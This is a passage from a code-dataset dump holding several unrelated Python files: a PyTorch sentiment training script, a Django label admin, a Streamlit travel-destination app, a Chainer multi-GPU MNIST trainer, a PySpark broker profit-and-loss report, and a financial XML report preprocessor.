epoch in range(1, EPOCHS + 1):\r\n epoch_start_time = time.time()\r\n train(train_dataloader)\r\n accu_val = evaluate(valid_dataloader)\r\n if total_accu is not None and total_accu > accu_val:\r\n scheduler.step()\r\n else:\r\n total_accu = accu_val\r\n print('-' * 59)\r\n print('| end of epoch {:3d} | time: {:5.2f}s | '\r\n 'valid accuracy {:8.3f} '.format(epoch,\r\n time.time() - epoch_start_time,\r\n accu_val))\r\n print('-' * 59)\r\nprint(f\"Total Training Time: {(time.time() - total_start_time) / 60:5.2f}mins\")\r\n\r\nprint(\"Saving the model\")\r\nnow = datetime.datetime.now()\r\nmodel_name = \"\".join([\"simple_sent_\", str(now.year), str(now.month), \r\n str(now.day), str(now.hour), str(now.minute), str(now.second)])\r\n\r\nif not os.path.isdir('./models'):\r\n os.mkdir('./models')\r\ntorch.save(model, \"./models/\" + model_name + \".pt\")\r\n\r\n\r\ndef predict(text, text_pipeline):\r\n with torch.no_grad():\r\n text = torch.tensor(text_pipeline(text)).long()\r\n output = model(text, torch.tensor([0]).long())\r\n return output.argmax(1).item()\r\n\r\nmodel.to(\"cpu\")\r\n\r\nprint(\"Classifying Training Data..\")\r\ntrue_labels = []\r\npred_labels = []\r\nfor text, label in movie_train:\r\n true_labels.append(label)\r\n prediction = predict(text, text_pipeline)\r\n pred_labels.append(prediction)\r\n\r\nprint(\"Writing Prediction .csv..\")\r\npred_df = pd.DataFrame(zip(true_labels, pred_labels), columns=[\"Trues\", \"Prediction\"])\r\npred_df.to_csv(\"./results/\" + model_name + \"_predictions_trues.csv\")","sub_path":"simple_sentiment_classification.py","file_name":"simple_sentiment_classification.py","file_ext":"py","file_size_in_byte":5911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} 
+{"seq_id":"505721610","text":"from django.contrib import admin\nfrom django.utils.html import format_html\n\nfrom label.form import LabelForm\nfrom label.models import Label\n\n\n# Register your models here.\n\n@admin.register(Label)\nclass LabelAdmin(admin.ModelAdmin):\n form = LabelForm\n fieldsets = (\n (None, {\n 'fields': ('project', 'name', 'color')\n }),\n )\n\n def label(self, obj):\n def complementaryColor(my_hex):\n if my_hex[0] == '#':\n my_hex = my_hex[1:]\n try:\n\n rgb = tuple(int(my_hex[i:i + 2], 16) for i in (0, 2, 4))\n if (rgb[0] * 0.299 + rgb[1] * 0.587 + rgb[2] * 0.114) > 127:\n return '#000000'\n return '#ffffff'\n except:\n return \"#000000\"\n\n return format_html(\n '<span style=\"background-color: {}; color: {}\">{}</span>',\n obj.color,\n complementaryColor(obj.color),\n obj.name)\n\n list_display = ('label',)\n","sub_path":"backend/label/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"413446233","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nfrom streamlit_folium import folium_static\nimport city_page\nimport country_page\nimport re\n\nimport folium as f\nfrom streamlit_folium import folium_static\n\nimport map as M\nimport queries as Q\n\n# define pages\nPAGES = {\n 'countryDetail': country_page,\n 'cityDetail': city_page\n}\n\n\n############################### FUNCTIONS ######################################\ndef _max_width_(): # CSS to make screen in wide mode\n max_width_str = f\"max-width: 1200px;\"\n st.markdown(\n f\"\"\"\n \n \"\"\",\n unsafe_allow_html=True,\n )\n\n\ndef background(): # CSS to change background\n max_width_str = f\"max-width: 2000px;\"\n st.markdown(\n \"\"\"\n \n \"\"\",\n unsafe_allow_html=True,\n )\n\n\ndef find_index(search_item, list):\n i = 0\n while i < len(list):\n if search_item == list[i]:\n return i\n i += 1\n return \"Not found\"\n\n\ndef options():\n return_list = {} # dictionary\n options.filter_by_capital = False\n options.custom_coordinates = False\n continent = 'all'\n region = 'all'\n country = 'all'\n\n if st.checkbox(\"Enable custom coordinates\"):\n options.custom_coordinates = True\n user_input = [(st.number_input(\"Latitude\"), st.number_input(\"Longitude\"))]\n options.user_coordinates = user_input\n\n if st.checkbox(\"Filter by Continent\"):\n continents = {'continent': [], 'label': []}\n result_list = Q.get_continents()\n if result_list == []:\n st.markdown(\"\"\n \"No results found, please try another option!\"\n \"\", unsafe_allow_html=True)\n else:\n for cont in result_list:\n continents['continent'].append(cont[0])\n continents['label'].append(cont[1])\n option_continent = st.selectbox(\n 'Which continents?',\n sorted(continents['label']))\n\n if option_continent:\n return_list['continent'] = option_continent\n index = find_index(option_continent, continents['label'])\n continent = continents['continent'][index]\n else:\n if result_list == []:\n st.markdown(\"\"\n \"No results found, please select a continent or unselect the checkbox!\"\n \"\", unsafe_allow_html=True)\n\n if st.checkbox(\"Filter by Region\"):\n regions = {'region': [], 'label': []}\n result_list = Q.get_regions(continent)\n if result_list == []:\n st.markdown(\"\"\n \"No results found, please try another option!\"\n \"\", unsafe_allow_html=True)\n else:\n for reg in result_list:\n regions['region'].append(reg[0])\n regions['label'].append(reg[1])\n option_region = st.selectbox(\n 'Which Region?',\n sorted(regions['label']))\n\n if 
option_region:\n return_list['region'] = option_region\n index = find_index(option_region, regions['label'])\n region = regions['region'][index]\n else:\n st.markdown(\"\"\n \"No results found, please select a region or unselect the checkbox!\"\n \"\", unsafe_allow_html=True)\n\n countries = {'country': [], 'label': []}\n for count in Q.get_countries(continent, region):\n countries['country'].append(count[0])\n countries['label'].append(count[1])\n option_country = st.selectbox(\n 'Which country?',\n sorted(countries['label']))\n\n if option_country: ## if there is an option, then we save it in the list\n return_list[\"country\"] = option_country\n index = find_index(option_country, countries['label'])\n country = countries['country'][index]\n options.country = country\n options.countrylabel = option_country\n else:\n st.markdown(\"\"\n \"No results found...\"\n \"\", unsafe_allow_html=True)\n\n if st.checkbox(\"Select City\"):\n options.filter_by_capital = True\n capitals = {'capital': [], 'label': []}\n result_list = Q.get_capitals(country)\n if result_list == []:\n st.markdown(\"\"\n \"No results found, please try another option!\"\n \"\", unsafe_allow_html=True)\n else:\n for cap in result_list:\n capitals['capital'].append(cap[0])\n capitals['label'].append(cap[1])\n option_capital = st.selectbox(\n 'Which City?',\n sorted(capitals['label']))\n\n if option_capital:\n return_list[\"capital\"] = option_capital\n index = find_index(option_capital, capitals['label'])\n capital = capitals['capital'][index]\n options.capital = capital\n options.capitallabel = option_capital\n else:\n st.markdown(\"\"\n \"No results found, please select a capital or unselect the checkbox!\"\n \"\", unsafe_allow_html=True)\n\n return return_list\n\n\ndef getMap(coordinates): ### tuples array! [(float, float), (float, float)]\n if not coordinates: ## if no coordinates, show general map\n return folium_static(f.Map())\n\n mapIt = f.Map()\n for coord in coordinates:\n mapIt = f.Map(location=[coord[0], coord[1]], zoom_start=4)\n f.Marker([coord[0], coord[1]]).add_to(mapIt)\n\n return folium_static(mapIt)\n\n\n############################### INTRODUCTION ####################################\n_max_width_()\nbackground()\nst.title(\"WELCOME TO TOURISTIQ\")\nif Q.endpoint is None:\n st.markdown(\"\"\n \"No endpoint inserted, check the readme file for instructions!\"\n \"\", unsafe_allow_html=True)\n\"\"\"\nLove to travel? Explore your options and find your next destination!\nOr are you already on your journey? Then learn more about the place you’re at and the place you’re going to next!\nJust click the country or city you want to find out more about, you can filter by continent and/or region.\n\"\"\"\ncol1, col2 = st.beta_columns([2, 3])\n\nwith col1:\n st.subheader(\"Please select the country or city that you want to view\")\n \"\"\"\n \"\"\"\n results_from_funoptions = options()\n for key, value in results_from_funoptions.items():\n \"You selected \" + key + \": \" + value\n\nwith col2:\n if not options.custom_coordinates: # Experimental feature to insert custom coordinates to test certain spots on the map.\n if not options.filter_by_capital: # Filters by country if capital filtering is not specified.\n try:\n cords = str(Q.get_country_coordinates(options.country)[0])\n cords = re.split('\\(|\\)| ', cords)\n M.getMap([(cords[2], cords[1])], 4)\n except:\n st.markdown(\"\"\n \"Oops! 
It appears that our external databases do not yet contain the coordinates of this country.\"\n \"This doesn't mean your option is invalid, please continue.\"\n \"\", unsafe_allow_html=True)\n else: # Filter by capital\n try:\n cords = Q.get_capital_coordinates(options.capital)\n M.getMap(cords, 12)\n except:\n st.markdown(\"\"\n \"Oops! It appears that our external databases do not yet contain the coordinates of this country.\"\n \"This doesn't mean your option is invalid, please continue.\"\n \"\", unsafe_allow_html=True)\n else: # Check inserted coordinates on the map.\n M.getMap(options.user_coordinates, 4)\n\n# I have decided to place the col2 in the button function, the map will now appear as the user gives input.\n\nif st.button('Find Places'):\n if hasattr(options, 'capital'):\n PAGES['cityDetail'].show(city=options.capital, cityName=options.capitallabel)\n else:\n PAGES['countryDetail'].show(country=options.country, countrylabel=options.countrylabel)","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":9687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"459230324","text":"def main():\n parser = argparse.ArgumentParser(description='Chainer example: MNIST')\n parser.add_argument('--batchsize', '-b', type=int, default=400, help='Number of images in each mini-batch')\n parser.add_argument('--epoch', '-e', type=int, default=20, help='Number of sweeps over the dataset to train')\n parser.add_argument('--gpu0', '-g', type=int, default=0, help='First GPU ID')\n parser.add_argument('--gpu1', '-G', type=int, default=1, help='Second GPU ID')\n parser.add_argument('--out', '-o', default='result_parallel', help='Directory to output the result')\n parser.add_argument('--resume', '-r', default='', help='Resume the training from snapshot')\n parser.add_argument('--unit', '-u', type=int, default=1000, help='Number of units')\n args = parser.parse_args()\n print('GPU: {}, {}'.format(args.gpu0, args.gpu1))\n print('# unit: {}'.format(args.unit))\n print('# Minibatch-size: {}'.format(args.batchsize))\n print('# epoch: {}'.format(args.epoch))\n print('')\n model = L.Classifier(train_mnist.MLP(args.unit, 10))\n optimizer = chainer.optimizers.Adam()\n optimizer.setup(model)\n (train, test) = chainer.datasets.get_mnist()\n train_iter = chainer.iterators.SerialIterator(train, args.batchsize)\n test_iter = chainer.iterators.SerialIterator(test, args.batchsize, repeat=False, shuffle=False)\n updater = training.ParallelUpdater(train_iter, optimizer, devices={\n 'main': args.gpu0,\n 'second': args.gpu1,\n })\n trainer = training.Trainer(updater, (args.epoch, 'epoch'), out=args.out)\n trainer.extend(extensions.Evaluator(test_iter, model, device=args.gpu0))\n trainer.extend(extensions.dump_graph('main/loss'))\n trainer.extend(extensions.snapshot(), trigger=(args.epoch, 'epoch'))\n trainer.extend(extensions.LogReport())\n trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss', 'main/accuracy', 'validation/main/accuracy']))\n trainer.extend(extensions.ProgressBar())\n if args.resume:\n chainer.serializers.load_npz(args.resume, trainer)\n trainer.run()","sub_path":"Data Set/bug-fixing-5/7feb6b5041b8e86fdfd58dcd0457277f65342e57-
-bug.py","file_name":"7feb6b5041b8e86fdfd58dcd0457277f65342e57-
-bug.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"15881938","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom pyspark import SparkConf, SparkContext, sql\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import *\nfrom pyspark.sql.types import *\n\nimport subprocess\nimport re\nfrom datetime import datetime, timedelta\n\ndef daily_report(date):\n ## Maybe reading data from mysql is better\n \n ## Create table \"Transaction\"\n spark = SparkSession.builder\\\n .appName(\"daily_report\")\\\n .getOrCreate()\n\n Transaction = spark.read.parquet(f\"hdfs://master/user/spark/twstock/raw_data/broker_transaction/{date}.parquet\")\n Transaction.createOrReplaceTempView(\"Transaction\")\n Transaction = spark.sql(\"SELECT sID,bID,Date,buy,buy*price cost,sell,sell*price recieve,price FROM Transaction\")\n\n ## Create table \"Open_Close\"\n Open_Close = spark.read.parquet(f\"hdfs://master/user/spark/twstock/raw_data/transactions/{date}.parquet\")\n Open_Close = Open_Close.createOrReplaceTempView(\"Open_Close\")\n Open_Close = spark.sql(\"SELECT sID,open,close FROM Open_Close\")\n\n ## Combine \"Transaction\" + \"Open_Close\"\n # aggregate \"sum\" and \"avg_price\"\n daily_tbl = Transaction.join(Open_Close,\"sID\")\n\n basic_agg = daily_tbl.groupBy(\"sID\",\"bID\",\"Date\",\"open\",\"close\")\\\n .agg(sum(\"buy\").alias(\"total_buy\"),\n sum(\"cost\").alias(\"total_cost\"),\n sum(\"sell\").alias(\"total_sell\"),\n sum(\"recieve\").alias(\"total_recieve\"),\n (sum(\"buy\") - sum(\"sell\")).alias(\"storage\"),\n (sum(\"cost\") / sum(\"buy\")).alias(\"avg_buy_price\"),\n (sum(\"recieve\") / sum(\"sell\")).alias(\"avg_sell_price\")\n )\n ## Fillna\n basic_agg = basic_agg.na.fill(0, \"avg_buy_price\").na.fill(0, \"avg_sell_price\")\n\n ## Split \"day_trade\" \"over_bought\" \"over_sold\"\n # when() to set \"if,elif,else\" \n over_bought = basic_agg.filter(basic_agg[\"storage\"] > 0)\\\n .groupBy(\"sID\",\"bID\",\"Date\",\"open\",\"close\",\n \"total_buy\",\"total_cost\",\"total_sell\",\"total_recieve\",\n \"storage\",\"avg_buy_price\",\"avg_sell_price\")\\\n .agg(sum(\"total_recieve\").alias(\"realize_ProfitLoss\"),\n (sum(\"storage\") * (sum(\"close\") - sum(\"avg_buy_price\"))).alias(\"unrealize_ProfitLoss\"),\n (sum(\"total_recieve\") + (sum(\"storage\") * (sum(\"close\") - sum(\"avg_buy_price\")))).alias(\"total_ProfitLoss\"),\n ((sum(\"total_recieve\") + (sum(\"storage\") * (sum(\"close\") - sum(\"avg_buy_price\")))) / \n sum(\"total_cost\")).alias(\"return_rate_%\"),\n )\n\n over_sold = basic_agg.filter(basic_agg[\"storage\"] < 0)\\\n .groupBy(\"sID\",\"bID\",\"Date\",\"open\",\"close\",\n \"total_buy\",\"total_cost\",\"total_sell\",\"total_recieve\",\n \"storage\",\"avg_buy_price\",\"avg_sell_price\")\\\n .agg((sum(\"total_recieve\") - sum(\"total_cost\")).alias(\"realize_ProfitLoss\"),\n (sum(\"storage\") * 0).alias(\"unrealize_ProfitLoss\"),\n (sum(\"total_recieve\") - sum(\"total_cost\")).alias(\"total_ProfitLoss\"),\n (when((sum(\"total_sell\") * sum(\"avg_buy_price\")) > 0,\n (sum(\"total_recieve\") - sum(\"total_cost\")) / (sum(\"total_sell\") * sum(\"avg_buy_price\")))\n ).alias(\"return_rate_%\"),\n )\n\n day_trading = basic_agg.filter(basic_agg[\"storage\"] == 0)\\\n .groupBy(\"sID\",\"bID\",\"Date\",\"open\",\"close\",\n \"total_buy\",\"total_cost\",\"total_sell\",\"total_recieve\",\n \"storage\",\"avg_buy_price\",\"avg_sell_price\")\\\n .agg((sum(\"total_recieve\") - 
sum(\"total_cost\")).alias(\"realize_ProfitLoss\"),\n (sum(\"storage\")).alias(\"unrealize_ProfitLoss\"),\n (sum(\"total_recieve\") - sum(\"total_cost\")).alias(\"total_ProfitLoss\"),\n ((sum(\"total_recieve\") - sum(\"total_cost\")) / sum(\"total_cost\")).alias(\"return_rate_%\"),\n )\n\n\n daily_report = over_bought.union(over_sold).union(day_trading)\n # use withColumn() changing \"fixed-point\" of data\n # use withColumn() changing \"Type\" of data\n daily_report = daily_report.withColumn(\"open\", round(daily_report[\"open\"], 2))\\\n .withColumn(\"close\", round(daily_report[\"close\"], 2))\\\n .withColumn(\"total_cost\", round(daily_report[\"total_cost\"], 2))\\\n .withColumn(\"total_recieve\", round(daily_report[\"total_recieve\"], 2))\\\n .withColumn(\"avg_buy_price\", round(daily_report[\"avg_buy_price\"], 2))\\\n .withColumn(\"avg_sell_price\", round(daily_report[\"avg_sell_price\"], 2))\\\n .withColumn(\"realize_ProfitLoss\", round(daily_report[\"realize_ProfitLoss\"], 2))\\\n .withColumn(\"unrealize_ProfitLoss\", round(daily_report[\"unrealize_ProfitLoss\"], 2))\\\n .withColumn(\"total_ProfitLoss\", round(daily_report[\"total_ProfitLoss\"], 2))\\\n .withColumn(\"return_rate_%\", round(daily_report[\"return_rate_%\"], 2))\n\n daily_report = daily_report.withColumn(\"sID\",col(\"sID\").cast(StringType()))\\\n .withColumn(\"bID\",col(\"bID\").cast(StringType()))\\\n .withColumn(\"Date\",col(\"Date\").cast(DateType()))\\\n .withColumn(\"open\",col(\"open\").cast(FloatType()))\\\n .withColumn(\"close\",col(\"close\").cast(FloatType()))\\\n .withColumn(\"total_buy\",col(\"total_buy\").cast(IntegerType()))\\\n .withColumn(\"total_cost\",col(\"total_cost\").cast(FloatType()))\\\n .withColumn(\"total_sell\",col(\"total_sell\").cast(IntegerType()))\\\n .withColumn(\"total_recieve\",col(\"total_recieve\").cast(FloatType()))\\\n .withColumn(\"storage\",col(\"storage\").cast(IntegerType()))\\\n .withColumn(\"avg_buy_price\",col(\"avg_buy_price\").cast(FloatType()))\\\n .withColumn(\"avg_sell_price\",col(\"avg_sell_price\").cast(FloatType()))\\\n .withColumn(\"realize_ProfitLoss\",col(\"realize_ProfitLoss\").cast(FloatType()))\\\n .withColumn(\"unrealize_ProfitLoss\",col(\"unrealize_ProfitLoss\").cast(FloatType()))\\\n .withColumn(\"total_ProfitLoss\",col(\"total_ProfitLoss\").cast(FloatType()))\\\n .withColumn(\"return_rate_%\",col(\"return_rate_%\").cast(FloatType()))\n\n ## Saving parquet()\n # depending on size of partition to use repartition()\n\n # Example for saving to mysql\n# .write.format('jdbc').options(\n# url=\"jdbc:mysql://120.97.27.92:3306/twstock?useSSL=false&rewriteBatchedStatements=true\",\n# driver='com.mysql.jdbc.Driver',\n# dbtable='table_name',\n# user='user_name',\n# password='user_password'\n# ).mode('append').save()\n daily_report.repartition(1).write.mode('overwrite').parquet(f\"hdfs://master/user/spark/twstock/analysis/broker_transaction/DR/{date}\")\n\n\nif __name__=='__main__':\n\n if datetime.now().hour>14:\n Curday=datetime.today().date().isoformat()\n else:\n Curday=(datetime.today()-timedelta(days=1)).date().isoformat()\n\n daily_report(Curday)\n\n\n\n","sub_path":"broker_DR_daily.py","file_name":"broker_DR_daily.py","file_ext":"py","file_size_in_byte":8118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"398159787","text":"'''----------------------------------------------------------------------\nProject: Prime Brokerage Project\nDepartment: Prime Services\nRequester: Francois Henrion\nDeveloper: Paul 
Jacot-Guillarmod\nCR Number: 666125 (Initial Deployment)\n\n----------------------------------------------------------------------\nHISTORY\n================================================================================\nDate Change no Developer Description\n--------------------------------------------------------------------------------\n 666125 Paul Jacot-Guillarmod Initial Implementation\n2011-06-29 699989 Rohan van der Walt Add account name for cash transaction report\n Add report name\n Add row level colours\n Add column widths\n2011-07-06 707904 Rohan van der Walt Add Invoice Nr\n Add RunLocation\n2011-07-15 713436 Rohan van der Walt Filter out [] and NaN values in Cells\n2011-08-03 XXXXXX Rohan van der Walt Replace any -0 or -0.00 values with 0 or 0.00\n2011-09-13 768482 Rohan van der Walt Remove Settled section instrument detail and remove LIVE grouping\n2011-11-08 823082 Rohan van der Walt Settled Grouping Rename\n2013-03-19 883716 Phumzile Mgcima Added Preprocessor to cater for Multiple dividends on PreProcessXML()\n2013-03-19 2014795 Hynek Urban Introduce PreprocessXMLSortBySettled.\n2015-05-13 2833272 Peter Basista Change the way how account name is obtained.\n'''\nimport acm, re\nfrom itertools import chain\nfrom xml.etree import ElementTree\n\nimport at_logging\n\n\nLOGGER = at_logging.getLogger()\n\n\ndef _addAccountName(xml, accName):\n ignored_statuses = [\"Simulated\", \"Void\"]\n try:\n rd = ReportData(xml)\n reports = rd.getDataAsArray()\n for report in reports:\n instrument_name = reports[report][len(reports[report]) - 1][0].text\n acm_instrument = acm.FInstrument[instrument_name]\n acm_trades = acm_instrument.Trades()\n relevant_trades = [trade for trade in acm_trades\n if trade.Status() not in ignored_statuses]\n if len(relevant_trades) == 1:\n accName = relevant_trades[0].Name()\n break\n else:\n LOGGER.warning((\"Could not find exactly one relevant trade on instrument '%s'.\"\n \"Found %s relevant trades instead.\"), acm_instrument.Name(), len(relevant_trades))\n\n root = ElementTree.XML(xml)\n reports = []\n if root.tag == 'PRIMEReport':\n reports.append(root)\n else:\n reports = root.findall('PRIMEReport')\n\n for report in reports:\n reportParameters = report.find(\"ReportParameters\")\n if not reportParameters:\n reportParameters = ElementTree.SubElement(report, \"ReportParameters\")\n ElementTree.SubElement(reportParameters, 'AccountName').text = accName\n\n return ElementTree.tostring(root)\n except:\n return xml\n\ndef _filterOutErrors(xml):\n try:\n rd = ReportData(xml)\n\n reports = rd.getDataAsArray()\n for report in reports:\n for row in reports[report]:\n for cell in row:\n try:\n if cell.text in ['[]', 'NaN', '#']:\n LOGGER.info('OLD: %s\\tNEW: ' , cell.text)\n cell.text = ''\n except:\n continue\n return rd.toXML()\n except:\n return xml\n\ndef _fixFormattingErrors(xml):\n try:\n pattern = r'^(-(0)*(\\.)?(0)*)$'\n rd = ReportData(xml)\n reports = rd.getDataAsArray()\n for report in reports:\n for row in reports[report]:\n for cell in row:\n try:\n myMatch = re.match(pattern, cell.text)\n if myMatch:\n new_text_val = cell.text.replace('-', '')\n LOGGER.info('OLD: %s\\tNEW: %s', cell.text, new_text_val)\n cell.text = new_text_val\n except:\n continue\n return rd.toXML()\n except:\n return xml\n\ndef _getDate(dateStr, customDate):\n ''' Convert trading manager date strings to actual dates\n '''\n if dateStr == 'Custom Date':\n try:\n return acm.Time().AsDate(customDate)\n except:\n return None\n elif dateStr == 'Now':\n return acm.Time().DateNow()\n 
elif dateStr == 'TwoDaysAgo':\n return acm.Time().DateAddDelta(acm.Time().DateNow(), 0, 0, -2)\n elif dateStr == 'PrevBusDay':\n calendar = acm.FCurrency['ZAR'].Calendar()\n if calendar:\n return calendar.AdjustBankingDays(acm.Time().DateNow(), -1)\n else:\n return acm.Time().DateAddDelta(acm.Time().DateNow(), 0, 0, -1)\n elif dateStr == 'Yesterday':\n return acm.Time().DateAddDelta(acm.Time().DateNow(), 0, 0, -1)\n elif dateStr == 'First Of Month':\n return acm.Time().FirstDayOfMonth(acm.Time().DateNow())\n elif dateStr == 'First Of Year':\n return acm.Time().FirstDayOfYear(acm.Time().DateNow())\n else:\n return None\n\n\ndef _addDates(xml):\n try:\n root = ElementTree.XML(xml)\n reports = []\n if root.tag == 'PRIMEReport':\n reports.append(root)\n else:\n reports = root.findall('PRIMEReport')\n\n START_DATE = 'Portfolio Profit Loss Start Date'\n START_DATE_CUSTOM = 'Portfolio Profit Loss Start Date Custom'\n END_DATE = 'Portfolio Profit Loss End Date'\n END_DATE_CUSTOM = 'Portfolio Profit Loss End Date Custom'\n dict = {\n START_DATE: None,\n START_DATE_CUSTOM: None,\n END_DATE: None,\n END_DATE_CUSTOM: None\n }\n\n for report in reports:\n for group in report.findall('ReportContents/Table/Settings/Groups/Group'):\n label = group.find('Label')\n if not label is None and label.text == 'Profit/Loss':\n columnId = None\n for element in group:\n if element.tag == 'Column':\n columnIdElement = element.find('ColumnId')\n if not columnIdElement is None:\n columnId = columnIdElement.text\n else:\n columnId = None\n elif element.tag == 'Cell':\n data = element.find('RawData')\n if not data is None:\n data = data.text\n if columnId == START_DATE:\n dict[START_DATE] = acm.FEnumeration['EnumPLStartDate'].Enumerator(data)\n elif columnId == START_DATE_CUSTOM:\n dict[START_DATE_CUSTOM] = data\n elif columnId == END_DATE:\n dict[END_DATE] = acm.FEnumeration['EnumPLEndDate'].Enumerator(data)\n elif columnId == END_DATE_CUSTOM:\n dict[END_DATE_CUSTOM] = data\n columnId = None\n else:\n columnId = None\n break\n\n reportParameters = report.find(\"ReportParameters\")\n if not reportParameters:\n reportParameters = ElementTree.SubElement(report, \"ReportParameters\")\n ElementTree.SubElement(reportParameters, 'PortfolioStartDate').text = _getDate(dict[START_DATE], dict[START_DATE_CUSTOM])\n ElementTree.SubElement(reportParameters, 'PortfolioEndDate').text = _getDate(dict[END_DATE], dict[END_DATE_CUSTOM])\n ElementTree.SubElement(reportParameters, 'DateToday').text = _getDate('Now', None)\n return ElementTree.tostring(root)\n except:\n return xml\n\ndef _addAddress(xml, partyName):\n ''' Add address elements to the report node\n '''\n try:\n root = ElementTree.XML(xml)\n reports = []\n if root.tag == 'PRIMEReport':\n reports.append(root)\n else:\n reports = root.findall('PRIMEReport')\n party = acm.FParty[partyName.upper()]\n for report in reports:\n reportParameters = report.find(\"ReportParameters\")\n if not reportParameters:\n reportParameters = ElementTree.SubElement(report, \"ReportParameters\")\n clientDetails = reportParameters.find(\"ClientDetails\")\n if not clientDetails:\n clientDetails = ElementTree.SubElement(reportParameters, \"ClientDetails\")\n ElementTree.SubElement(clientDetails, 'FullName').text = str(party.Fullname())\n ElementTree.SubElement(clientDetails, 'Address').text = str(party.Address())\n ElementTree.SubElement(clientDetails, 'City').text = str(party.City())\n ElementTree.SubElement(clientDetails, 'ZipCode').text = str(party.ZipCode())\n ElementTree.SubElement(clientDetails, 
'Country').text = str(party.Country())\n\n return ElementTree.tostring(root)\n except:\n return xml\n\ndef _addColumnWidths(xml):\n '''\n Scans through the column data and automatically sets the column width wide enough\n OR reads from extension value?\n This will only work on single report xml files, NOT multireports\n '''\n try:\n SPACE_PER_CHAR = 2.8\n PAGE_WIDTH = 278\n rd = ReportData(xml)\n reports = rd.getDataAsArray()\n for report in reports:\n colWidths = {}\n colSpaces = {}\n for i in range(len(reports[report][0])):\n colWidths.setdefault(i, 5)\n colSpaces.setdefault(i, 0)\n for column in range(len(reports[report][0])):\n try:\n spaceCount = reports[report][0][column].text.count(' ')\n except:\n spaceCount = 0;\n colSpaces[column] = max([colSpaces[column], spaceCount])\n for row in range(len(reports[report])):\n try:\n cellText = reports[report][row][column].text if reports[report][row][column].text else ''\n except:\n cellText = ''\n colWidths[column] = max([colWidths[column], len(cellText)])\n try:\n colName = reports[report][0][column].text if reports[report][0][column].text else ''\n except:\n colName = ''\n if colName == 'Issuer':\n colWidths[column] = float(colWidths[column]) / 1.5\n elif colName == 'Date and Time':\n colWidths[column] = float(colWidths[column]) / 1.5\n\n # Write Results\n report = rd.getReportNode(report)\n reportParameters = report.find(\"ReportParameters\")\n if not reportParameters:\n reportParameters = ElementTree.SubElement(report, \"ReportParameters\")\n columnWidths = reportParameters.find(\"ColumnWidths\")\n if not columnWidths:\n columnWidths = ElementTree.SubElement(reportParameters, \"ColumnWidths\")\n scaled = {}\n for key, val in colWidths.items():\n scaled[key] = float(val * SPACE_PER_CHAR) / 1.4 if colSpaces[key] >= 1 else val * SPACE_PER_CHAR\n total = sum(scaled[i] for i in scaled.keys())\n factor = PAGE_WIDTH / total\n for key, val in scaled.items():\n ElementTree.SubElement(columnWidths, 'c', attrib={'id':str(key)}).text = str(val * factor) + 'mm'\n\n return rd.toXML()\n except:\n return xml\n\ndef _addGroupLevelColours(xml):\n '''\n read extensionValue to set group level background colours\n '''\n try:\n rd = ReportData(xml)\n reports = rd.getDataAsArray()\n for report in reports:\n treeDepth = rd.getTreeDepth(report)\n report = rd.getReportNode(report)\n reportParameters = report.find(\"ReportParameters\")\n if not reportParameters:\n reportParameters = ElementTree.SubElement(report, \"ReportParameters\")\n groupingLevelBackgroundColour = reportParameters.find(\"GroupingLevelBackgroundColour\")\n if not groupingLevelBackgroundColour:\n groupingLevelBackgroundColour = ElementTree.SubElement(reportParameters, \"GroupingLevelBackgroundColour\")\n # print 'Found tree depth of', treeDepth\n if treeDepth == 1:\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour1').text = '#ffffff'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour2').text = '#ffffff'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour3').text = '#ffffff'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour4').text = '#ffffff'\n elif treeDepth == 2:\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour1').text = '#d1d1d1'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour2').text = '#ffffff'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour3').text = '#ffffff'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour4').text = '#ffffff'\n elif treeDepth == 3:\n 
ElementTree.SubElement(groupingLevelBackgroundColour, 'colour1').text = '#d1d1d1'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour2').text = '#e1e1e1'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour3').text = '#ffffff'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour4').text = '#ffffff'\n elif treeDepth == 4:\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour1').text = '#d1d1d1'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour2').text = '#e1e1e1'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour3').text = '#e8e8e8'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour4').text = '#ffffff'\n elif treeDepth == 5:\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour1').text = '#d1d1d1'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour2').text = '#d9d9d9'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour3').text = '#e1e1e1'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour4').text = '#e8e8e8'\n ElementTree.SubElement(groupingLevelBackgroundColour, 'colour5').text = '#ffffff'\n return rd.toXML()\n except:\n return xml\n\n\ndef _addReportParameter(xml, name, value):\n '''\n add a node to reportParameters\n '''\n try:\n root = ElementTree.XML(xml)\n reports = []\n if root.tag == 'PRIMEReport':\n reports.append(root)\n else:\n reports = root.findall('PRIMEReport')\n\n for report in reports:\n reportParameters = report.find(\"ReportParameters\")\n if not reportParameters:\n reportParameters = ElementTree.SubElement(report, \"ReportParameters\")\n ElementTree.SubElement(reportParameters, name).text = value\n return ElementTree.tostring(root)\n except:\n return xml\n\n\nclass ReportData():\n root = None\n\n def __init__(self, xml):\n 